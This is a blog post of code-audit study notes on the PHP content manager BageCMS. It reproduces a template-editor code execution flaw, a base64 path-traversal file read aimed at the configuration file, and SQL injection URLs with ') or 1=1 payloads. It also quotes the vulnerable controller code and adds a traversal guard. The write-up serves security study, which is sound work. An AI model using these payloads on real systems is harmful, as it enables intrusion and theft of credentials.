PHP code audit study notes: BageCMS (八哥cms) code audit

Source code

https://github.com/Betsy0/CMSVulSource/tree/main/bagecms

Environment setup

Open php.ini
Search the whole file for soap
Delete the ; in front of the extension line (this enables the soap extension)
Create a database named bagecms

create database bagecms;

Visit /index.php?r=install
Complete the installation
Then visit /index.php?r=admini

Vulnerability reproduction

1. RCE via template rendering
Log in to the admin backend

Edit index.php in the question directory


2. Arbitrary file read
Click submit and capture the request

The filename parameter is base64-encoded

?r=admini/Template/Update&filename=Li4vLi4vLi4vcHJvdGVjdGVkL2NvbmZpZy9tYWluLnBocA==


3. SQL injection

?r=admini/post/index&catalogId=&title=fafadf&titleAlias=fad') or 1=1%23&searchsubmit=查询
?r=admini/post/index&catalogId=&title=fafadf&titleAlias=fad') or 1=2%23&searchsubmit=查询

Or

?r=admini/post/index&titleAlias=fad') or 1=1%23
?r=admini/post/index&titleAlias=fad') or 1=2%23
?r=admini/post/index&title=fad') or 1=1%23
?r=admini/post/index&title=fad') or 1=2%23


Code audit

Command execution code audit

1. Since the RCE happens in the template editor, search the code base for "模板" (template)

2. Locate the edit action:

    /**
     * Edit
     *
     * @param $id
     */
    public function actionUpdate( $filename ) {
        parent::_acl();
        $filename = trim( $this->_gets->getParam( 'filename' ) );
        $content = trim( $this->_gets->getParam( 'content' ) );
        if ( isset( $_POST['content'] ) ) {
            // the base64-decoded filename is joined into the path and written to with no check at all
            $fileputcontent = file_put_contents(  $this->_themePath.DS.'views'.DS.XUtils::b64decode( $filename ), $content );
            if ( $fileputcontent == true ) {
                parent::_adminiLogger( array( 'catalog'=>'update', 'intro'=>'编辑模板' ) );
                $this->redirect( array ( 'index' ) );
            }
        }
        $data['filename'] = XUtils::b64decode( $filename );
        // the same unchecked path is read back for display
        $data['content'] = htmlspecialchars( file_get_contents(  $this->_themePath.DS.'views'.DS.XUtils::b64decode( $filename ) ) );
        $this->render( 'update', $data );

    }


After editing the template in the backend, the source file itself is modified directly (/themes/default/views/question/index.php)

2. Arbitrary file read
Same location as above
The filename is only base64-decoded and then concatenated into the path without any check, so directory traversal can be used to read the configuration file
Open question: how is the route ?r=admini/template/update constructed?
3. SQL injection
Search the code base globally for common SQL fragments such as SELECT, LIKE, etc.
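As an added example (not BageCMS code), this is how the filename handling in actionUpdate could be guarded before any file_get_contents or file_put_contents call; the views directory path is an assumed value.

```php
<?php
// Added example, not BageCMS code: a guarded replacement for the
// XUtils::b64decode( $filename ) path building seen in actionUpdate.
// The views directory passed in is an assumed install path.

/**
 * Return the full path of a template inside $viewsDir, or null when the
 * base64 filename is malformed or would escape the views directory.
 */
function safe_view_path(string $viewsDir, string $b64Filename): ?string
{
    // Strict decoding rejects anything that is not well-formed base64.
    $decoded = base64_decode($b64Filename, true);
    if ($decoded === false || $decoded === '' || strpos($decoded, "\0") !== false) {
        return null;
    }
    // Normalise separators so "..\" is treated exactly like "../".
    $segments = explode('/', str_replace('\\', '/', $decoded));
    // A leading separator means an absolute path: reject it.
    if ($segments[0] === '') {
        return null;
    }
    $clean = [];
    foreach ($segments as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;          // collapse "//" and "./"
        }
        if ($seg === '..') {
            return null;       // any parent-directory step is refused outright
        }
        $clean[] = $seg;
    }
    // Templates are .php files under views/; refuse anything else.
    if ($clean === [] || substr(end($clean), -4) !== '.php') {
        return null;
    }
    return rtrim($viewsDir, '/') . '/' . implode('/', $clean);
}

// Constructed demo: the legitimate template edited in the write-up, then the
// traversal payload from the write-up that points at protected/config/main.php.
$views = '/var/www/bagecms/themes/default/views';   // assumed install path
foreach ([base64_encode('question/index.php'),
          'Li4vLi4vLi4vcHJvdGVjdGVkL2NvbmZpZy9tYWluLnBocA=='] as $name) {
    $path = safe_view_path($views, $name);
    echo $name, ' => ', $path === null ? 'rejected' : $path, PHP_EOL;
}
```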

    public function actionIndex ()
    {
        parent::_acl();
        $model = new Page();
        $criteria = new CDbCriteria();
        $condition = '1';
        $title = $this->_gets->getParam('title');
        $titleAlias = $this->_gets->getParam('titleAlias');
        // both request parameters are concatenated straight into the WHERE clause, with no escaping or parameter binding
        $title && $condition .= ' AND title LIKE \'%' . $title . '%\'';
        $titleAlias && $condition .= ' AND title_alias LIKE \'%' . $titleAlias . '%\'';
        $criteria->condition = $condition;
        $criteria->order = 't.id DESC';
        $count = $model->count($criteria);
        $pages = new CPagination($count);
        $pages->pageSize = 13;
        $pageParams = XUtils::buildCondition($_GET, array ('page_name_alias' , 'page_name' ));
        $pages->params = is_array($pageParams) ? $pageParams : array ();
        $criteria->limit = $pages->pageSize;
        $criteria->offset = $pages->currentPage * $pages->pageSize;
        $result = $model->findAll($criteria);
        $this->render('index', array ('datalist' => $result , 'pagebar' => $pages ));
    }

index.php

$(document).ready(function(){
	$("#title").val('<?php echo Yii::app()->request->getParam('title')?>');
	$("#titleAlias").val('<?php echo Yii::app()->request->getParam('titleAlias')?>');
	$("#catalogId").val('<?php echo Yii::app()->request->getParam('catalogId')?>');
});

There is no filtering at all
So ') or 1=1%23 can be inserted
The URL can be as follows; title can be replaced with titleAlias

r=admini/post/index&title=fad') or 1=1%23

Open question: why does ') close the statement rather than '?

posted @ 2023-10-27 21:40 BattleofZhongDinghe